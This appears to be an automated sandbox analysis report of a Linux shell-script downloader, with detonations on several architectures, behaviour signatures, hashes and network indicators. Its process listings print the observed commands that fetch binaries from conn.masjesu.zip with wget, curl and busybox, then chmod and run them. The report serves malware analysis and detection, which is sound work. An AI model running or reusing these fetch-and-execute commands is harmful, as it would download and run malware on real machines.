Analysis Overview
| SHA256 | c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653 |
Threat Level: Shows suspicious behavior
The file c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
| Reported | 2024-10-29 02:53 |
Signatures
Analysis: behavioral2
Detonation Overview
| Submitted | 2024-10-29 02:53 |
| Reported | 2024-10-29 02:55 |
| Platform | debian9-armhf-20240611-en |
| Max time kernel | 149s |
| Max time network | 9s |
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh
[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
| Submitted | 2024-10-29 02:53 |
| Reported | 2024-10-29 02:55 |
| Platform | debian9-mipsbe-20240611-en |
| Max time kernel | 149s |
| Max time network | 84s |
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | N/A |
| N/A | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | N/A |
| N/A | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | N/A |
| N/A | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | N/A |
| N/A | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | N/A |
| N/A | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | N/A |
| N/A | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | N/A |
| N/A | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | N/A |
| N/A | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | N/A |
| N/A | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | N/A |
| N/A | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | N/A |
| N/A | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | N/A |
| N/A | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | N/A |
| N/A | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | /usr/bin/curl | N/A |
Processes
/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh
[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/chmod
[chmod 777 ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N
[./ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/rm
[rm ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N
| MD5 | 7689ca8c5bc85cf6b78ef89323d4df6a |
| SHA1 | a1392ec3b571b3de167f0b9a5dadab4f14a2db76 |
| SHA256 | 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5 |
| SHA512 | 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471 |
/tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
| Submitted | 2024-10-29 02:53 |
| Reported | 2024-10-29 02:55 |
| Platform | debian9-mipsel-20240611-en |
| Max time kernel | 124s |
| Max time network | 148s |
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | N/A |
| N/A | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | N/A |
| N/A | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | N/A |
| N/A | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | N/A |
| N/A | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | N/A |
| N/A | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | N/A |
| N/A | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | N/A |
| N/A | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | N/A |
| N/A | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | N/A |
| N/A | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | N/A |
| N/A | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | N/A |
| N/A | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | N/A |
| N/A | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | N/A |
| N/A | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | /usr/bin/curl | N/A |
Processes
/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh
[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/chmod
[chmod 777 ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N
[./ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/rm
[rm ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
Files
/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N
/tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 02:53
Reported
2024-10-29 02:55
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
132s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh
[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.193.91:443 | | tcp |
| GB | 195.181.164.17:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |